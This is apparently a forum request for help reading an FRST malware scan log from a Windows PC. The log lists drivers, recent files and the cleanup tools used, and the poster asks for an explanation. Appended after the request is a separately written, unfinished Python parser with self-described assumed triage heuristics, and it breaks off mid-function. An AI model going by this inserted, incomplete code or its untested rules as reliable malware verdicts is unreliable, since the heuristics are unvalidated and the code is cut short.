R3 DroidCamVideo; C:\Windows\System32\DRIVERS\droidcamvideo.sys [229432 2017-03-11] (Dev47Apps)
R3 dtlitescsibus; C:\Windows\System32\DRIVERS\dtlitescsibus.sys [30264 2016-12-12] (Disc Soft Ltd)
R3 dtliteusbbus; C:\Windows\System32\DRIVERS\dtliteusbbus.sys [47672 2016-12-12] (Disc Soft Ltd)
R2 MBAMChameleon; C:\Windows\system32\drivers\MBAMChameleon.sys [188352 2017-07-30] (Malwarebytes)
R3 MBAMFarflt; C:\Windows\system32\drivers\farflt.sys [101784 2017-07-30] (Malwarebytes)
R3 MBAMProtection; C:\Windows\system32\drivers\mbam.sys [45472 2017-07-30] (Malwarebytes)
R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [253856 2017-07-30] (Malwarebytes)
R3 MBAMWebProtection; C:\Windows\system32\drivers\mwac.sys [84256 2017-07-30] (Malwarebytes)
S3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [30144 2017-06-28] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\System32\drivers\nvvad64v.sys [48064 2017-06-28] (NVIDIA Corporation)
R3 nvvhci; C:\Windows\System32\DRIVERS\nvvhci.sys [57792 2017-06-28] (NVIDIA Corporation)
S3 RtlWlanu; C:\Windows\System32\DRIVERS\rtwlanu.sys [3741960 2015-06-19] (Realtek Semiconductor Corporation                           )
R2 rzpmgrk; C:\Windows\system32\drivers\rzpmgrk.sys [44144 2016-09-17] (Razer, Inc.)
R2 rzpnk; C:\Windows\system32\drivers\rzpnk.sys [137840 2016-09-08] (Razer, Inc.)
S3 VBoxUSB; C:\Windows\System32\Drivers\VBoxUSB.sys [114632 2015-09-16] (BigNox Corporation)
R1 VBoxUSBMon; C:\Windows\System32\DRIVERS\VBoxUSBMon.sys [127432 2015-09-16] (BigNox Corporation)
R1 XQHDrv; C:\Windows\System32\DRIVERS\XQHDrv.sys [253384 2015-09-16] (BigNox Corporation)
R1 XQHDrv; C:\Windows\SysWOW64\DRIVERS\XQHDrv.sys [253384 2015-09-16] (BigNox Corporation)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-07-30 10:45 - 2017-07-30 10:45 - 00000358 _____ C:\Users\AMD\Desktop\Addition.txt
2017-07-30 10:43 - 2017-07-30 10:43 - 00000617 _____ C:\Users\AMD\Desktop\Mwb Blocked.txt
2017-07-30 10:40 - 2017-07-30 10:48 - 00022806 _____ C:\Users\AMD\Desktop\FRST.txt
2017-07-30 10:39 - 2017-07-30 10:40 - 00000000 ____D C:\FRST
2017-07-30 10:38 - 2017-07-30 10:38 - 00004806 _____ C:\Users\AMD\Desktop\AdwCleaner[C0].txt
2017-07-30 10:34 - 2017-07-30 10:34 - 02381312 _____ (Farbar) C:\Users\AMD\Desktop\FRST64.exe
2017-07-30 10:32 - 2017-07-30 10:35 - 00000000 ____D C:\AdwCleaner
2017-07-30 10:32 - 2017-07-30 10:32 - 08162248 _____ (Malwarebytes) C:\Users\AMD\Desktop\adwcleaner_7.0.0.0.exe
2017-07-30 09:36 - 2017-07-30 09:58 - 00000000 ____D C:\ComboFix
2017-07-30 09:36 - 2017-07-30 09:49 - 00000000 ____D C:\Windows\erdnt
2017-07-30 09:36 - 2017-07-30 09:36 - 00000000 ____D C:\Qoobox
2017-07-30 09:36 - 2011-06-26 13:45 - 00256000 _____ C:\Windows\PEV.exe
2017-07-30 09:36 - 2010-11-08 00:20 - 00208896 _____ C:\Windows\MBR.exe
2017-07-30 09:36 - 2009-04-20 11:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2017-07-30 09:36 - 2000-08-31 07:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2017-07-30 09:36 - 2000-08-31 07:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2017-07-30 09:36 - 2000-08-31 07:00 - 00098816 _____ C:\Windows\sed.exe
2017-07-30 09:36 - 2000-08-31 07:00 - 00080412 _____ C:\Windows\grep.exe
2017-07-30 09:36 - 2000-08-31 07:00 - 00068096 _____ C:\Windows\zip.exe
2017-07-30 09:31 - 2017-07-30 09:33 - 00212546 _____ C:\TDSSKiller.3.1.0.15_30.07.2017_09.31.12_log.txt
2017-07-30 09:15 - 2017-07-30 09:16 - 04922400 _____ (AO Kaspersky Lab) C:\Users\AMD\Desktop\tdsskiller.exe
2017-07-30 02:47 - 2017-07-30 10:37 - 00101784 _____ (Malwarebytes) C:\Windows\system32\Drivers\farflt.sys
2017-07-30 02:47 - 2017-07-30 10:37 - 00084256 _____ (Malwarebytes) C:\Windows\system32\Drivers\mwac.sys
2017-07-30 02:36 - 2017-07-30 09:51 - 00188352 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMChameleon.sys
2017-07-30 02:35 - 2017-07-30 10:37 - 00253856 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2017-07-30 02:35 - 2017-07-30 10:37 - 00045472 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
2017-07-30 02:35 - 2017-07-30 02:35 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2017-07-30 02:35 - 2017-07-30 02:35 - 00000000 ____D C:\ProgramData\Malwarebytes
2017-07-30 02:35 - 2017-07-30 02:35 - 00000000 ____D C:\Program Files\Malwarebytes
2017-07-30 02:35 - 2017-06-27 12:06 - 00077376 _____ C:\Windows\system32\Drivers\mbae64.sys
2017-07-30 02:34 - 2017-07-30 02:35 - 65033984 _____ (Malwarebytes ) C:\Users\AMD\Downloads\mb3-setup-consumer-3.1.2.1733-1.0.160-1.0.2251.exe
2017-07-30 01:59 - 2017-07-30 01:59 - 00000000 ____D C:\Windows\Minidump
2017-07-30 01:36 - 2017-07-30 01:36 - 00000000 _____ C:\autoexec.bat
2017-07-30 01:26 - 2017-07-30 01:26 - 00000000 ____D C:\ProgramData\DataCache
2017-07-30 01:16 - 2017-07-30 01:23 - 00000000 ____D C:\ProgramData\Cache
2017-07-30 01:13 - 2017-07-30 01:13 - 00000000 ____D C:\Users\AMD\AppData\Local\yc
2017-07-30 01:11 - 2017-07-30 01:11 - 00000000 ____D C:\Windows\system32\tmp
2017-07-30 01:09 - 2017-07-30 02:23 - 00000034 _____ C:\Users\Public\Documents\{DE764086-1C0A-4DD3-90BA-0B93BDD794BE}
2017-07-30 01:08 - 2017-07-30 01:08 - 00000000 ____D C:\Users\Public\Documents\Tools
2017-07-30 01:08 - 2017-07-30 01:08 - 00000000 ____D C:\Users\Public\Documents\Baidu
2017-07-30 01:07 - 2017-07-30 01:07 - 00000552 _____ C:\Users\AMD\Downloads\heroes (1).torrent
2017-07-30 00:56 - 2017-07-30 00:56 - 00000572 _____ C:\Users\AMD\Downloads\heroes.torrent
2017-07-27 13:42 - 2017-07-27 13:42 - 00000000 ____D C:\VivoxLogs
2017-07-27 13:20 - 2017-07-27 00:55 - 03130440 _____ C:\Windows\SysWOW64\pbsvc_blr.exe
2017-07-26 14:44 - 2017-07-30 02:27 - 00000000 ____D C:\Users\AMD\AppData\Local\PunkBuster
2017-07-26 14:44 - 2017-07-27 15:44 - 00291512 _____ C:\Windows\SysWOW64\PnkBstrB.xtr
2017-07-26 14:43 - 2017-07-27 15:45 - 00076152 _____ C:\Windows\SysWOW64\PnkBstrA.exe
2017-07-26 14:43 - 2017-07-27 15:44 - 00291512 _____ C:\Windows\SysWOW64\PnkBstrB.exe
2017-07-26 14:43 - 2017-07-27 13:20 - 00189248 _____ C:\Windows\SysWOW64\PnkBstrB.ex0
2017-07-23 13:09 - 2017-07-30 10:45 - 00000000 ____D C:\Users\AMD\AppData\Local\CrashDumps
2017-07-23 12:57 - 2017-07-23 12:57 - 00000000 ____D C:\Users\AMD\AppData\Local\UnrealEngine
2017-07-23 12:57 - 2017-07-23 12:57 - 00000000 ____D C:\Users\AMD\AppData\Local\Citadel
2017-07-23 03:28 - 2017-07-23 03:28 - 00000222 _____ C:\Users\AMD\Desktop\Citadel Forged With Fire (Beta).url
2017-07-22 00:37 - 2017-07-22 00:37 - 00000000 ____D C:\Users\AMD\AppData\Local\Chromium
2017-07-22 00:36 - 2017-07-30 01:10 - 00000000 ____D C:\Users\AMD\AppData\Roaming\NVIDIA
2017-07-21 20:54 - 2017-07-21 20:54 - 00000936 _____ C:\Users\Public\Desktop\CPUID CPU-Z Gigabyte.lnk
2017-07-21 20:54 - 2017-07-21 20:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CPUID
2017-07-21 20:54 - 2017-07-21 20:54 - 00000000 ____D C:\Program Files\CPUID
2017-07-21 20:45 - 2017-07-21 20:47 - 00000000 ____D C:\Users\AMD\AppData\Local\NVIDIA
2017-07-21 20:44 - 2017-07-24 21:36 - 00000000 ____D C:\Users\AMD\AppData\Local\NVIDIA Corporation
2017-07-21 20:41 - 2017-07-21 20:43 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation
2017-07-21 20:41 - 2017-07-21 20:41 - 00004146 _____ C:\Windows\System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-21 20:41 - 2017-07-21 20:41 - 00003852 _____ C:\Windows\System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-21 20:41 - 2017-07-21 20:41 - 00003814 _____ C:\Windows\System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-21 20:41 - 2017-07-21 20:41 - 00003738 _____ C:\Windows\System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-21 20:41 - 2017-07-21 20:41 - 00003730 _____ C:\Windows\System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-21 20:41 - 2017-07-21 20:41 - 00003554 _____ C:\Windows\System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-21 20:41 - 2017-07-21 20:41 - 00001416 _____ C:\Users\Public\Desktop\GeForce Experience.lnk
2017-07-21 20:41 - 2017-06-28 05:38 - 01903040 _____ (NVIDIA Corporation) C:\Windows\system32\nvspcap64.dll
2017-07-21 20:41 - 2017-06-28 05:38 - 01755072 _____ (NVIDIA Corporation) C:\Windows\system32\nvspbridge64.dll
2017-07-21 20:41 - 2017-06-28 05:38 - 01489344 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvspcap.dll
2017-07-21 20:41 - 2017-06-28 05:38 - 01317312 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvspbridge.dll
2017-07-21 20:41 - 2017-06-28 05:38 - 00121280 _____ C:\Windows\system32\NvRtmpStreamer64.dll
2017-07-21 20:40 - 2017-07-21 20:40 - 00003738 _____ C:\Windows\System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-21 20:40 - 2017-07-21 20:40 - 00003494 _____ C:\Windows\System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-21 20:40 - 2017-07-21 20:40 - 00000000 ____D C:\Program Files (x86)\VulkanRT
2017-07-21 20:40 - 2017-06-28 05:38 - 00001951 _____ C:\Windows\NvTelemetryContainerRecovery.bat
2017-07-21 20:40 - 2017-06-28 04:03 - 06462400 _____ (NVIDIA Corporation) C:\Windows\system32\nvcpl.dll
2017-07-21 20:40 - 2017-06-28 04:03 - 02478712 _____ (NVIDIA Corporation) C:\Windows\system32\nvsvc64.dll
2017-07-21 20:40 - 2017-06-28 04:03 - 01762936 _____ (NVIDIA Corporation) C:\Windows\system32\nvsvcr.dll
2017-07-21 20:40 - 2017-06-28 04:03 - 00549312 _____ (NVIDIA Corporation) C:\Windows\system32\nv3dappshext.dll
2017-07-21 20:40 - 2017-06-28 04:03 - 00392312 _____ (NVIDIA Corporation) C:\Windows\system32\nvmctray.dll
2017-07-21 20:40 - 2017-06-28 04:03 - 00082040 _____ (NVIDIA Corporation) C:\Windows\system32\nv3dappshextr.dll
2017-07-21 20:40 - 2017-06-28 04:03 - 00069752 _____ (NVIDIA Corporation) C:\Windows\system32\nvshext.dll
2017-07-21 20:40 - 2017-06-28 03:27 - 00135616 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvStreaming.exe
2017-07-21 20:40 - 2017-06-23 03:30 - 08076177 _____ C:\Windows\system32\nvcoproc.bin
2017-07-21 20:40 - 2017-03-11 04:17 - 00536864 _____ C:\Windows\system32\vulkan-1.dll
2017-07-21 20:40 - 2017-03-11 04:17 - 00525600 _____ C:\Windows\SysWOW64\vulkan-1.dll
2017-07-21 20:40 - 2017-03-11 04:17 - 00254240 _____ C:\Windows\system32\vulkaninfo.exe
2017-07-21 20:40 - 2017-03-11 04:17 - 00233760 _____ C:\Windows\SysWOW64\vulkaninfo.exe
2017-07-21 20:39 - 2017-07-30 10:38 - 00000000 ____D C:\ProgramData\NVIDIA
2017-07-21 20:39 - 2017-07-21 20:46 - 00000000 ____D C:\ProgramData\NVIDIA Corporation
2017-07-21 20:39 - 2017-06-28 05:38 - 00001951 _____ C:\Windows\NvContainerRecovery.bat
2017-07-21 20:38 - 2017-06-28 05:38 - 40239736 _____ (NVIDIA Corporation) C:\Windows\system32\nvcompiler.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 35798136 _____ (NVIDIA Corporation) C:\Windows\system32\nvoglv64.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 35314296 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcompiler.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 28922488 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvoglv32.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 21432048 _____ (NVIDIA Corporation) C:\Windows\system32\nvwgf2umx.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 18726880 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvwgf2um.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 17806048 _____ (NVIDIA Corporation) C:\Windows\system32\nvd3dumx.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 15437248 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvlddmkm.sys
2017-07-21 20:38 - 2017-06-28 05:38 - 14688096 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvd3dum.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 13559376 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuda.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 12337112 _____ (NVIDIA Corporation) C:\Windows\system32\nvopencl.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 12132272 _____ (NVIDIA Corporation) C:\Windows\system32\nvptxJitCompiler.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 11501960 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcuda.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 10381336 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvopencl.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 09982456 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvptxJitCompiler.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 04186824 _____ (NVIDIA Corporation) C:\Windows\system32\nvapi64.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 03803256 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuvid.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 03691192 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvapi.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 03359168 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcuvid.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 01988216 _____ (NVIDIA Corporation) C:\Windows\system32\nvdispco6438476.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 01615448 _____ (NVIDIA Corporation) C:\Windows\system32\nvhdagenco6420103.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 01597888 _____ (NVIDIA Corporation) C:\Windows\system32\nvdispgenco6438476.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 01066616 _____ (NVIDIA Corporation) C:\Windows\system32\NvFBC64.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 01004480 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvFBC.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 00972736 _____ (NVIDIA Corporation) C:\Windows\system32\NvIFR64.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 00924280 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvIFR.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 00689808 _____ (NVIDIA Corporation) C:\Windows\system32\nvfatbinaryLoader.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 00609728 _____ (NVIDIA Corporation) C:\Windows\system32\NvIFROpenGL.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 00578056 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvfatbinaryLoader.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 00512672 _____ (NVIDIA Corporation) C:\Windows\system32\nvEncodeAPI64.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 00499320 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvIFROpenGL.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 00491720 _____ (NVIDIA Corporation) C:\Windows\system32\nvumdshimx.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 00429920 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvEncodeAPI.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 00407064 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvumdshim.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 00218712 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvhda64v.sys
2017-07-21 20:38 - 2017-06-28 05:38 - 00179136 _____ (NVIDIA Corporation) C:\Windows\system32\nvaudcap64v.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 00171384 _____ (NVIDIA Corporation) C:\Windows\system32\nvinitx.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 00154208 _____ (NVIDIA Corporation) C:\Windows\system32\nvoglshim64.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 00149224 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvinit.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 00146368 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvaudcap32v.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 00132072 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvoglshim32.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 00057792 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvvhci.sys
2017-07-21 20:38 - 2017-06-28 05:38 - 00048064 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvvad64v.sys
2017-07-21 20:38 - 2017-06-28 05:38 - 00045976 _____ (NVIDIA Corporation) C:\Windows\system32\nvhdap64.dll
2017-07-21 20:38 - 2017-06-28 05:38 - 00044110 _____ C:\Windows\system32\nvinfo.pb
2017-07-21 20:38 - 2017-06-28 05:38 - 00000669 _____ C:\Windows\SysWOW64\nv-vk32.json
2017-07-21 20:38 - 2017-06-28 05:38 - 00000669 _____ C:\Windows\system32\nv-vk64.json
2017-07-21 20:37 - 2017-07-21 20:41 - 00000000 ____D C:\Program Files\NVIDIA Corporation
2017-07-21 20:37 - 2017-07-21 20:37 - 00000000 ____D C:\NVIDIA
2017-07-21 20:26 - 2017-07-21 20:26 - 00081309 _____ C:\Users\AMD\Documents\Untitled (3).wma
2017-07-21 20:26 - 2017-07-21 20:26 - 00058859 _____ C:\Users\AMD\Documents\Untitled (2).wma
2017-07-21 20:12 - 2017-07-21 20:09 - 00189112 _____ (Power Admin LLC) C:\Windows\PAExec.exe
2017-07-21 20:11 - 2017-07-30 09:29 - 00389272 _____ C:\Windows\ntbtlog.txt
2017-07-20 19:34 - 2017-07-20 19:34 - 00000724 _____ C:\Users\Public\Desktop\Secret World Legends.lnk
2017-07-20 19:34 - 2017-07-20 19:34 - 00000000 ____D C:\Users\AMD\AppData\Local\Funcom
2017-07-20 19:34 - 2017-07-20 19:34 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Funcom
2017-07-20 06:22 - 2017-07-23 11:54 - 00000000 ____D C:\Users\AMD\AppData\Local\Argo
2017-07-20 06:22 - 2017-07-20 06:24 - 00000000 ____D C:\Users\AMD\Documents\Argo
2017-07-20 06:22 - 2017-07-20 06:22 - 00000000 ____D C:\ProgramData\Bohemia Interactive
2017-07-12 15:33 - 2017-07-12 15:33 - 00000000 ____D C:\Users\AMD\AppData\Roaming\Python
2017-07-11 19:02 - 2017-07-11 19:02 - 00062482 _____ C:\Users\AMD\Downloads\SAVE_20170711_190106.jpeg
2017-07-10 10:56 - 2017-07-10 10:56 - 00013930 _____ C:\Users\AMD\Downloads\Form data Konsumen (PT.ELLANE ABADI PERKASA).xlsx
2017-07-04 17:34 - 2017-07-06 17:23 - 00000000 ____D C:\Program Files\Mozilla Firefox

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-07-30 10:44 - 2009-07-14 11:45 - 00021072 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2017-07-30 10:44 - 2009-07-14 11:45 - 00021072 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2017-07-30 10:38 - 2017-05-04 16:13 - 00000000 ____D C:\Users\AMD\AppData\Local\MyComGames
2017-07-30 10:37 - 2016-11-02 10:55 - 00000000 ____D C:\Program Files (x86)\Hi-Rez Studios
2017-07-30 10:36 - 2009-07-14 12:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2017-07-30 09:52 - 2009-07-14 09:34 - 00000215 _____ C:\Windows\system.ini
2017-07-30 09:50 - 2016-08-17 14:38 - 00000000 ____D C:\Users\AMD\AppData\Roaming\DMCache
2017-07-30 09:50 - 2009-07-14 09:34 - 65273856 _____ C:\Windows\system32\config\SOFTWARE.bak
2017-07-30 09:50 - 2009-07-14 09:34 - 22544384 _____ C:\Windows\system32\config\SYSTEM.bak
2017-07-30 09:50 - 2009-07-14 09:34 - 00262144 _____ C:\Windows\system32\config\SECURITY.bak
2017-07-30 09:50 - 2009-07-14 09:34 - 00262144 _____ C:\Windows\system32\config\SAM.bak
2017-07-30 09:50 - 2009-07-14 09:34 - 00262144 _____ C:\Windows\system32\config\DEFAULT.bak
2017-07-30 09:42 - 2016-09-19 14:24 - 00000000 ____D C:\ProgramData\TEMP
2017-07-30 09:02 - 2016-08-04 14:36 - 00000000 ____D C:\Program Files (x86)\Steam
2017-07-30 02:28 - 2016-08-03 17:48 - 00000000 ____D C:\Users\AMD
2017-07-30 02:27 - 2016-08-04 20:12 - 00000000 ____D C:\Users\AMD\AppData\Roaming\BitTorrent
2017-07-30 02:27 - 2016-08-03 18:06 - 00000000 ____D C:\Users\AMD\AppData\Local\Mozilla
2017-07-30 02:27 - 2009-07-14 10:20 - 00000000 ___HD C:\Windows\system32\GroupPolicy
2017-07-30 02:27 - 2009-07-14 10:20 - 00000000 ____D C:\Windows\SysWOW64\GroupPolicy
2017-07-30 02:27 - 2009-07-14 10:20 - 00000000 ____D C:\Windows\registration
2017-07-30 02:27 - 2009-07-14 10:20 - 00000000 ____D C:\Windows\inf
2017-07-30 02:27 - 2009-07-14 10:20 - 00000000 ____D C:\Windows\AppCompat
2017-07-30 02:27 - 2009-07-14 10:20 - 00000000 ____D C:\Program Files\Labi Analysis
2017-07-30 02:19 - 2016-08-03 18:47 - 00000000 ____D C:\[Smad-Cage]
2017-07-27 13:24 - 2016-11-02 10:58 - 00000000 ____D C:\Users\AMD\Documents\My Games
2017-07-24 16:08 - 2016-08-15 21:14 - 00000000 ____D C:\Users\AMD\Documents\work office
2017-07-24 00:02 - 2017-06-21 22:20 - 00003509 _____ C:\Users\AMD\Desktop\ENEQ.txt
2017-07-23 11:48 - 2009-07-14 10:20 - 00000000 ____D C:\Windows\system32\NDF
2017-07-22 22:30 - 2016-08-19 12:25 - 00000000 ____D C:\Users\AMD\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2017-07-22 22:12 - 2016-08-17 14:38 - 00000000 ____D C:\Users\AMD\Downloads\Compressed
2017-07-21 20:49 - 2009-07-14 12:13 - 00781582 _____ C:\Windows\system32\PerfStringBackup.INI
2017-07-21 20:41 - 2017-04-05 00:54 - 00000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2017-07-21 20:40 - 2009-07-14 10:20 - 00000000 ____D C:\Windows\Help
2017-07-21 20:15 - 2009-07-14 12:08 - 00032560 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2017-07-21 09:05 - 2016-09-04 15:45 - 00000000 ____D C:\XiaoMi
2017-07-20 06:21 - 2016-08-03 18:17 - 00000000 ____D C:\ProgramData\Package Cache
2017-07-12 15:33 - 2017-02-15 11:06 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mafia
2017-07-12 15:29 - 2016-09-16 19:06 - 00000000 ____D C:\Users\AMD\Documents\EHEM
2017-07-12 15:27 - 2016-08-17 21:58 - 00000000 ____D C:\Users\AMD\AppData\Local\Glyph
2017-07-12 03:01 - 2016-10-31 21:34 - 00002441 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2017-07-06 17:36 - 2016-08-03 18:47 - 00000000 ____D C:\Program Files (x86)\SMADAV
2017-07-06 14:56 - 2016-12-02 00:12 - 00000000 ____D C:\Users\AMD\AppData\LocalLow\Mozilla
2017-07-02 22:37 - 2017-04-25 16:32 - 00000000 ____D C:\Users\AMD\AppData\Roaming\discord
2017-07-02 22:02 - 2016-08-04 16:19 - 00002195 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2017-07-02 22:02 - 2016-08-04 16:19 - 00002183 _____ C:\Users\Public\Desktop\Google Chrome.lnk

==================== Files in the root of some directories =======

2017-03-11 14:33 - 2017-03-11 14:33 - 0000036 _____ () C:\ProgramData\droidcam-settings

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2017-07-23 04:15

==================== End of FRST.txt ============================

Can someone kindly explain to me?

thanks b4

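The FRST listing above is long, and the lines a helper actually reads are the handful of entries in unexpected places. As an added example (not FRST's or Malwarebytes' own code, and not something posted in this thread), here is a small Python parser for the `One Month Created/Modified files and folders` line format with a few triage heuristics: PE files with no publisher field, executables in user-writable or temp locations, hidden or zero-byte executables, and new directories created directly under the drive root. The sample lines are constructed to mimic the format (two of the paths echo ones seen in this thread), and the heuristics and directory list are my own assumptions; a hit means "look closer", not "malicious".

```python
"""FRST "One Month Created/Modified" triage helper (added example, not FRST code).
Heuristics and the SUSPECT_DIRS list are assumptions; sample lines are constructed."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# One FRST entry: <created> - <modified> - <size> <attrs> [(<publisher>)] <path>
# attrs is a 5-char field: _____ plain file, ____D directory, ____H hidden, ___HD both.
FRST_LINE = re.compile(
    r"^(?P<created>\d{4}-\d{2}-\d{2} \d{2}:\d{2}) - "
    r"(?P<modified>\d{4}-\d{2}-\d{2} \d{2}:\d{2}) - "
    r"(?P<size>\d+) (?P<attrs>[A-Z_]{5}) "
    r"(?:\((?P<publisher>[^)]*)\) )?"
    r"(?P<path>\S.*?)\s*$"
)

EXEC_EXT = (".exe", ".dll", ".sys", ".scr", ".bat", ".cmd", ".vbs", ".ps1", ".js")
PE_EXT = (".exe", ".dll", ".sys", ".scr")  # only PE files carry the (publisher) field

# Assumed list of lower-case locations where a freshly created executable is unusual.
SUSPECT_DIRS = (
    "\\appdata\\local\\temp\\", "\\appdata\\roaming\\", "\\appdata\\local\\",
    "c:\\programdata\\", "c:\\users\\public\\", "c:\\windows\\temp\\",
    "c:\\windows\\system32\\tmp\\",
)


@dataclass
class Entry:
    created: str
    modified: str
    size: int
    attrs: str
    publisher: Optional[str]
    path: str

    @property
    def is_dir(self) -> bool:
        return "D" in self.attrs

    @property
    def is_hidden(self) -> bool:
        return "H" in self.attrs


def parse_frst_line(line: str) -> Optional[Entry]:
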